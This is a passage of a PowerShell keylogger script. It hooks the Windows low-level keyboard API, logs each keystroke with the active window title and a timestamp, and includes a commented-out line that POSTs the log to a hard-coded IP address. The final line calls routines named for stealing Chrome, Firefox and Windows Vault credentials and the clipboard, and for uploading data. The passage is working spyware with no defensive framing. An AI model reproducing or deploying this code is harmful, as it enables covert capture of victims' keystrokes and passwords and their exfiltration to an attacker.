1246 | $Keys::F3 { $Key = '<F3>' } | |
1247 | $Keys::F4 { $Key = '<F4>' } | |
1248 | $Keys::F5 { $Key = '<F5>' } | |
1249 | $Keys::F6 { $Key = '<F6>' } | |
1250 | $Keys::F7 { $Key = '<F7>' } | |
1251 | $Keys::F8 { $Key = '<F8>' } | |
1252 | $Keys::F9 { $Key = '<F9>' } | |
1253 | $Keys::F10 { $Key = '<F10>' } | |
1254 | $Keys::F11 { $Key = '<F11>' } | |
1255 | $Keys::F12 { $Key = '<F12>' } | |
1256 | ||
1257 | $Keys::Snapshot { $Key = '<Print Screen>' } | |
1258 | $Keys::Scroll { $Key = '<Scroll Lock>' } | |
1259 | $Keys::Pause { $Key = '<Pause/Break>' } | |
1260 | $Keys::Insert { $Key = '<Insert>' } | |
1261 | $Keys::Home { $Key = '<Home>' } | |
1262 | $Keys::Delete { $Key = '<Delete>' } | |
1263 | $Keys::End { $Key = '<End>' } | |
1264 | $Keys::Prior { $Key = '<Page Up>' } | |
1265 | $Keys::Next { $Key = '<Page Down>' } | |
1266 | $Keys::Escape { $Key = '<Esc>' } | |
1267 | $Keys::NumLock { $Key = '<Num Lock>' } | |
1268 | $Keys::Capital { $Key = '<Caps Lock>' } | |
1269 | $Keys::Tab { $Key = '<Tab>' } | |
1270 | $Keys::Back { $Key = '<Backspace>' } | |
1271 | $Keys::Enter { $Key = '<Enter>' } | |
1272 | $Keys::Space { $Key = '< >' } | |
1273 | $Keys::Left { $Key = '<Left>' } | |
1274 | $Keys::Up { $Key = '<Up>' } | |
1275 | $Keys::Right { $Key = '<Right>' } | |
1276 | $Keys::Down { $Key = '<Down>' } | |
1277 | $Keys::LMenu { $Key = '<Alt>' } | |
1278 | $Keys::RMenu { $Key = '<Alt>' } | |
1279 | $Keys::LWin { $Key = '<Windows Key>' } | |
1280 | $Keys::RWin { $Key = '<Windows Key>' } | |
1281 | $Keys::LShiftKey { $Key = '<Shift>' } | |
1282 | $Keys::RShiftKey { $Key = '<Shift>' } | |
1283 | $Keys::LControlKey { $Key = '<Ctrl>' } | |
1284 | $Keys::RControlKey { $Key = '<Ctrl>' } | |
1285 | $Keys::MouseClick { $Key = '<LMouse>' } | |
1286 | } | |
1287 | } | |
1288 | ||
1289 | # Get foreground window's title | |
1290 | $Title = New-Object Text.Stringbuilder 256 | |
1291 | $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity) | |
1292 | ||
1293 | # Define object properties | |
1294 | $Props = @{ | |
1295 | Key = $Key | |
1296 | Time = [DateTime]::Now | |
1297 | Window = $Title.ToString() | |
1298 | ||
1299 | } | |
1300 | ||
1301 | $obj = New-Object psobject -Property $Props | |
1302 | ||
1303 | # Hack since Export-CSV doesn't have an append switch in PSv2 | |
1304 | $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1]+'[]nl' | |
1305 | #Invoke-WebRequest -uri "http://45.79.173.232:9002/log" -Method POST -Body $JSON | |
1306 | Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode | |
1307 | } | |
1308 | return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam) | |
1309 | } | |
1310 | ||
1311 | # Cast scriptblock as LowLevelKeyboardProc callback | |
1312 | $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr]) | |
1313 | $Callback = $CallbackScript -as $Delegate | |
1314 | ||
1315 | # Get handle to PowerShell for hook | |
1316 | $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName | |
1317 | $ModuleHandle = $GetModuleHandle.Invoke($PoshModule) | |
1318 | ||
1319 | # Set WM_KEYBOARD_LL hook | |
1320 | $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0) | |
1321 | ||
1322 | $Stopwatch = [Diagnostics.Stopwatch]::StartNew() | |
1323 | ||
1324 | while ($true) { | |
1325 | if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break } | |
1326 | $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0) | |
1327 | Start-Sleep -Milliseconds 10 | |
1328 | } | |
1329 | ||
1330 | $Stopwatch.Stop() | |
1331 | ||
1332 | # Remove the hook | |
1333 | $UnhookWindowsHookEx.Invoke($Hook) | |
1334 | } | |
1335 | ||
1336 | # Setup KeyLogger's runspace | |
1337 | $PowerShell = [PowerShell]::Create() | |
1338 | [void]$PowerShell.AddScript($Script) | |
1339 | [void]$PowerShell.AddArgument($LogPath) | |
1340 | if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) } | |
1341 | ||
1342 | # Start KeyLogger | |
1343 | [void]$PowerShell.BeginInvoke() | |
1344 | ||
1345 | if ($PassThru.IsPresent) { return $PowerShell } | |
1346 | } | |
1347 | ||
1348 | Get-Keystrokes; Title-Monitor; WebGet; GetChrome; GetFF; GetVault; Gclip; WebPost |